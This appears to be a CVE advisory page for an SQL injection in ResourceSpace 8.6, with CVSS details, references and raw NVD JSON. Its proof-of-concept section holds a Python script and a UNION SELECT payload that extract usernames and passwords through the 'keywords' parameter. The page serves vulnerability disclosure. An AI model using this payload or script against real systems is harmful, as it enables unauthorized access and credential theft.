CVE-2019-25693

Description

ResourceSpace 8.6 contains an SQL injection vulnerability that allows authenticated attackers to execute arbitrary SQL queries by injecting malicious code through the keywords parameter in collection_edit.php. Attackers can submit POST requests with crafted SQL payloads in the keywords field to extract sensitive database information including schema names, user credentials, and other confidential data.

CVSS Details

CVSS Score

7.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:montala:resourcespace:8.6:*:*:*:*:*:*:* - VULNERABLE

ResourceSpace 8.6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target configuration
target_url = "http://target.com/collection_edit.php"
session = requests.Session()

# Attacker credentials (Low privilege required)
login_data = {
    "username": "attacker",
    "password": "password"
}
# Login step (simplified)
session.post("http://target.com/login.php", data=login_data)

# Malicious payload for SQL Injection in 'keywords' parameter
# Using boolean-based or union-based injection to extract data
payload = "1' UNION SELECT NULL, username, password FROM users-- -"

# Exploit request
exploit_data = {
    "keywords": payload,
    "ref": "collection_id"
}

response = session.post(target_url, data=exploit_data)

# Check if data is leaked in response
if "admin" in response.text:
    print("Vulnerability exploited successfully!")
else:
    print("Exploit failed.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2019-25693
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2019-25693
[3] CVE Details https://www.cvedetails.com/cve/CVE-2019-25693/
[4] VulDB https://vuldb.com/cve/CVE-2019-25693
[5] https://www.exploit-db.com/exploits/46274
[6] https://www.resourcespace.com/
[7] https://www.resourcespace.com/get
[8] https://www.vulncheck.com/advisories/resourcespace-sql-injection-via-collection-edit-php

Raw JSON Data

JSON

{"cve": {"id": "CVE-2019-25693", "sourceIdentifier": "[email protected]", "published": "2026-04-12T13:16:32.270", "lastModified": "2026-04-17T16:37:04.143", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ResourceSpace 8.6 contains an SQL injection vulnerability that allows authenticated attackers to execute arbitrary SQL queries by injecting malicious code through the keywords parameter in collection_edit.php. Attackers can submit POST requests with crafted SQL payloads in the keywords field to extract sensitive database information including schema names, user credentials, and other confidential data."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:montala:resourcespace:8.6:*:*:*:*:*:*:*", "matchCriteriaId": "E0674594-08AA-4178-BCBB-00C9CDABC637"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/46274", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.resourcespace.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.resourcespace.com/get", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/resourcespace-sql-injection-via-collection-edit-php", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}